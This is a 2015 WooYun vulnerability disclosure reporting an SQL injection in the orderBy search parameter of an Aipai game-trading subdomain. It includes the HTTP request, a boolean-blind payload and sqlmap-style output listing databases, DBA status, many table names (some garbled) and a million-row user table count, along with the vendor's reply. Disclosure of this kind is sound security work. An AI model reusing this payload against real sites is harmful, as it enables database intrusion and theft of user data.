当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117904

漏洞标题:爱拍某重要站点SQL注射泄露百万用户信息DBA权限

相关厂商:爱拍

漏洞作者: 紫霞仙子

提交时间:2015-06-03 10:17

修复时间:2015-07-18 16:42

公开时间:2015-07-18 16:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向核心白帽子及相关领域专家公开
2015-06-23: 细节向普通白帽子公开
2015-07-03: 细节向实习白帽子公开
2015-07-18: 细节向公众公开

简要描述:

233

详细说明:

表太多了,好多user,好多order
GET /buy_goods/search?areaId=&by=&cspfFlag=1&gameId=289&orderBy=2&pageRecords=10&serverId=&teamId=&tradeId=0&typeId=&typeIdHidden=0&whpfFlag=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: yxcz.aipai.com
Cookie: ***********
Host: yxcz.aipai.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*

漏洞证明:

---
Parameter: orderBy (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: areaId=&by=&cspfFlag=1&gameId=289&orderBy=-4403 OR 9522=9522&pageRecords=10&serverId=&teamId=&tradeId=0&typeId=&typeIdHidden=0&whpfFlag=1
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5
current user:    '[email protected]'
current user is DBA:    True
available databases [13]:
[*] db_fornalanweb
[*] db_fornalanweb_bak
[*] i3yx_core_db
[*] i3yx_core_db_bak
[*] i3yx_core_db_month
[*] i3yx_core_db_year
[*] i3yx_core_history
[*] i3yx_message
[*] i3yx_mobile_db
[*] i3yx_safety_db
[*] information_schema
[*] mysql
[*] test
Database: i3yx_core_db
[303 tables]
+-----------------------------------------+
| activity_aucsio_more_concession         |
| api_fetch_sale_confg                    |
| appr_apprae                             |
| baePoods_atribute_vs_trade_type         |
| base_gamePareer                         |
| di_goods_type_big_vs_trade_ype          |
| dl_user_game^path                       |
| ssistant_zw_account                     |
| use_ihfo_appd                           |
| user_user_login_banchg                  |
| wow_goods_tyne\\rehation                |
| activity_auction                        |
| activity_auction_base_config            |
| activity_auction_base_config_session    |
| activity_auction_dl_order               |
| activity_auction_visit_record           |
| activity_signing_star                   |
| activity_star_games                     |
| activity_star_news                      |
| ago_account_dgh_info                    |
| ago_account_own                         |
| ago_articles                            |
| ago_goods                               |
| ago_goods_append_info                   |
| ago_goods_market                        |
| ago_order_assess                        |
| ago_order_bf_apply                      |
| ago_order_change_person                 |
| ago_order_conversion_apply              |
| ago_order_deal_record                   |
| ago_orders                              |
| ago_user_accounts                       |
| ago_user_roles                          |
| api_fetch_sale_config_user              |
| api_fetch_sale_game_data                |
| api_game_base_relation                  |
| api_goods_relation                      |
| api_oa_role_config                      |
| api_phone_message                       |
| api_phone_message_logs                  |
| api_tasks                               |
| api_tasks_log                           |
| api_user_config                         |
| api_user_config_detail                  |
| api_user_trust_ip_detail                |
| app_version                             |
| appr_attr_config                        |
| appr_count                              |
| appr_credit                             |
| appr_rank_config                        |
| assistant_answer                        |
| b@se_game_way                           |
| base_account_atribute_config            |
| base_account_atribute_vs_trade_type     |
| base_account_config_dgh                 |
| base_account_email                      |
| base_account_type                       |
| base_activity                           |
| base_advert_aipai                       |
| base_alarm_record                       |
| base_arda                               |
| base_atribute_config_detail             |
| base_attach_info                        |
| base_auto_audit_config                  |
| base_auto_audit_detail                  |
| dl_orders                               |
| dl_orders_discuss    
。。。。。。。。。
好多user表,这个就100万
Database: i3yx_core_db
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| user_user | 1056517 |
+-----------+---------+

修复方案:

~~~~~~~~~~~~~~·

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-06-03 16:40

厂商回复:

多谢反馈,这是挂在爱拍二级域名的合作方的数据库,已告知合作方。

最新状态:

暂无